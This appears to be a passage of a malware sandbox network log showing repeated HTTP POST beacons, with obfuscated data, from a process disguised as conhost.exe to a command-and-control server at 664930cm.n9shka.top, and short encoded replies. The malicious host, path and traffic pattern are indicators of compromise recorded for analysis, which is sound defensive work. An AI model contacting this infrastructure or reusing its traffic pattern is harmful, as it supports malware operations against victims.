                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:57:57.234302044 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:57:57.590303898 CEST1120OUTData Raw: 58 51 5f 5a 59 49 51 55 5c 58 57 5a 54 59 55 5f 59 55 59 5b 50 5d 56 49 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XQ_ZYIQU\XWZTYU_YUY[P]VI[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!Y9?!8 [*=_'X*[2'^,8'-$W&W>U2B.<28T<!F/'P,!
                                                          Oct 1, 2024 05:57:57.859369040 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:57:57.992934942 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:57:57 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          26192.168.2.64973837.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:57:58.447370052 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:57:58.793350935 CEST1120OUTData Raw: 5d 57 5f 5a 59 43 54 56 5c 58 57 5a 54 59 55 5a 59 5a 59 5a 50 5d 56 46 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]W_ZYCTV\XWZTYUZYZYZP]VF[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"94!Z?2-^0%^#/3>8V%*U&$-(2<W+!F/'P,!
                                                          Oct 1, 2024 05:57:59.053325891 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:57:59.181299925 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:57:58 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          27192.168.2.64973937.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:57:59.310153008 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:57:59.668317080 CEST1120OUTData Raw: 58 51 5a 5e 5c 44 54 50 5c 58 57 5a 54 5e 55 50 59 52 59 57 50 5e 56 42 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XQZ^\DTP\XWZT^UPYRYWP^VB[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!:3!(([>$6$8</3+U%=?2*2$1?T8U(9!F/'P,=
                                                          Oct 1, 2024 05:57:59.934602022 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:00.069160938 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:57:59 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          28192.168.2.64974037.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:00.202050924 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:00.560297012 CEST1120OUTData Raw: 58 50 5a 5b 5c 45 51 52 5c 58 57 5a 54 5a 55 51 59 52 59 58 50 5d 56 48 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XPZ[\EQR\XWZTZUQYRYXP]VH[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT",036] =&&.2^2$-3/R0.(W1911?18V+9!F/'P,-


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          29192.168.2.64974137.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:00.764462948 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1828
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:01.121498108 CEST1828OUTData Raw: 5d 56 5a 5b 59 45 54 57 5c 58 57 5a 54 5b 55 58 59 51 59 56 50 5d 56 41 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]VZ[YETW\XWZT[UXYQYVP]VA[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"-,"3>"'>5$8?];3#0> S%!914&_<T8V<9!F/'P,-
                                                          Oct 1, 2024 05:58:01.152592897 CEST1236OUTData Raw: 24 12 3a 55 2f 25 2c 5a 2a 19 02 52 23 3f 35 55 2a 20 32 1b 25 06 03 1c 23 01 25 5f 27 28 34 14 26 05 13 0d 3d 3e 20 5c 24 34 26 07 2b 00 24 31 2b 5b 20 1a 39 5e 0c 29 0b 0e 04 25 27 27 16 00 24 54 52 1b 3a 01 5b 06 13 2b 24 1b 3d 3b 05 26 39 23
                                                          Data Ascii: $:U/%,Z*R#?5U* 2%#%_'(4&=> \$4&+$1+[ 9^)%''$TR:[+$=;&9#8Y>>/(Z0=:2/&Y2=97#3: X!2=$1"_9Z?$ ^1?()$T3-:@-=""<:+$1:9V3R4.=X'<%<X0X+;&-!%#]"?<'1W)</#:<^5:2:4$02<:!<
                                                          Oct 1, 2024 05:58:01.376286983 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:01.508830070 CEST308INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:01 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0e 1d 25 5e 27 1a 32 1f 36 02 3e 00 3d 01 37 5a 30 37 0d 5b 2c 2d 06 09 25 3f 20 04 3a 31 26 5d 3c 5f 2e 58 31 3d 2b 5b 26 21 2a 52 26 36 20 5f 0d 10 21 02 35 5e 3e 12 2c 29 37 58 3e 31 30 43 27 20 02 00 33 23 2e 53 28 3d 3b 0a 24 2c 39 54 30 3c 35 0a 2e 26 34 5e 29 24 2c 11 23 01 2d 56 02 1e 22 57 31 3b 22 0f 23 01 22 06 33 16 3c 5f 22 16 35 50 2a 3e 01 04 24 1a 0f 02 2a 2d 20 00 28 5a 3f 10 36 03 21 5b 20 57 32 0a 27 33 27 5c 20 0d 2d 51 05 34 5a 50
                                                          Data Ascii: %^'26>=7Z07[,-%? :1&]<_.X1=+[&!*R&6 _!5^>,)7X>10C' 3#.S(=;$,9T0<5.&4^)$,#-V"W1;"#"3<_"5P*>$*- (Z?6![ W2'3'\ -Q4ZP


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          30192.168.2.64974237.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:00.886586905 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:01.230814934 CEST1120OUTData Raw: 5d 50 5f 59 5c 44 54 5f 5c 58 57 5a 54 5c 55 5e 59 54 59 5a 50 5d 56 42 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]P_Y\DT_\XWZT\U^YTYZP]VB[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!X-#T";0>0"&\-3?S0$!!1&[+<V<9!F/'P,
                                                          Oct 1, 2024 05:58:01.491219997 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:01.625001907 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:01 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          31192.168.2.64974337.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:01.747724056 CEST347OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Oct 1, 2024 05:58:02.105789900 CEST1120OUTData Raw: 5d 55 5f 5b 59 47 54 51 5c 58 57 5a 54 5c 55 50 59 54 59 5a 50 5f 56 49 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]U_[YGTQ\XWZT\UPYTYZP_VI[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT":3+T5;=%'X!1;#Y;0?$.8V&2=2$.\(1+(9!F/'P,
                                                          Oct 1, 2024 05:58:02.362976074 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:02.531914949 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:02 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          32192.168.2.64974437.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:02.653613091 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:03.032437086 CEST1120OUTData Raw: 5d 51 5a 58 5c 43 54 52 5c 58 57 5a 54 52 55 5f 59 5a 59 57 50 5d 56 41 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]QZX\CTR\XWZTRU_YZYWP]VA[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!^-U0 +=!$-.18+,#$(W%W"U%"]<24W?!F/'P,
                                                          Oct 1, 2024 05:58:03.280139923 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:03.417182922 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:03 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          33192.168.2.64974537.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:03.556848049 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:03.902724028 CEST1120OUTData Raw: 58 57 5f 55 5c 41 54 5e 5c 58 57 5a 54 5e 55 59 59 54 59 5c 50 50 56 48 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XW_U\AT^\XWZT^UYYTY\PPVH[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT",3T")=]0>$(8304V112(2?<!F/'P,=
                                                          Oct 1, 2024 05:58:04.215714931 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:04.288882017 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:04 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          34192.168.2.64974637.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:04.445091009 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:04.793356895 CEST1120OUTData Raw: 58 52 5a 58 5c 44 54 57 5c 58 57 5a 54 53 55 5f 59 56 59 5d 50 51 56 40 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XRZX\DTW\XWZTSU_YVY]PQV@[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"-0"(]>T%]'=-$8- #$=<&W.$$2[(2$U(9!F/'P,
                                                          Oct 1, 2024 05:58:05.059312105 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:05.194909096 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:04 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          35192.168.2.64974737.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:05.326306105 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:05.684154987 CEST1120OUTData Raw: 5d 56 5a 5e 59 40 54 50 5c 58 57 5a 54 5c 55 5f 59 55 59 5b 50 5a 56 49 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]VZ^Y@TP\XWZT\U_YUY[PZVI[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!^.#R!0]=")\'X>20/U7W$='%>$$&Z>!(T?)!F/'P,
                                                          Oct 1, 2024 05:58:05.936384916 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:06.069905996 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:05 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          36192.168.2.64974837.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:06.200678110 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          37192.168.2.64974937.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:06.539853096 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1820
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:06.887140989 CEST1820OUTData Raw: 58 5d 5a 5c 59 48 51 56 5c 58 57 5a 54 5f 55 5e 59 55 59 5a 50 59 56 40 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: X]Z\YHQV\XWZT_U^YUYZPYV@[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT",3?5+;=:'%$(3Y8;S0-+%$$1+!$U+9!F/'P,9
                                                          Oct 1, 2024 05:58:07.128727913 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:07.262018919 CEST308INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:06 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0e 1d 26 07 33 0a 0c 1f 21 2f 22 02 2a 2c 23 58 27 34 27 14 2d 3d 2f 18 26 06 23 19 3a 32 0f 05 3f 00 21 00 25 2d 27 5d 32 32 31 0a 27 26 20 5f 0d 10 22 5a 21 16 32 1c 3b 3a 33 5c 3e 31 34 43 32 09 2c 01 27 33 0b 0a 2b 3d 38 1c 26 3c 04 0a 27 3f 31 0d 2f 36 28 10 3e 09 3b 0f 21 2b 2d 56 02 1e 22 53 32 5e 3a 09 22 3c 2a 06 27 5e 28 5d 20 3b 3e 0d 3d 3d 38 11 24 37 3d 04 3d 04 23 11 2b 3c 06 03 22 3a 3d 5f 34 32 3e 0e 33 09 27 5c 20 0d 2d 51 05 34 5a 50
                                                          Data Ascii: &3!/"*,#X'4'-=/&#:2?!%-']221'& _"Z!2;:3\>14C2,'3+=8&<'?1/6(>;!+-V"S2^:"<*'^(] ;>==8$7==#+<":=_42>3'\ -Q4ZP


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          38192.168.2.64975037.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:06.670768976 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:07.027745962 CEST1120OUTData Raw: 58 57 5a 5c 5c 45 54 52 5c 58 57 5a 54 52 55 5b 59 52 59 59 50 59 56 49 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
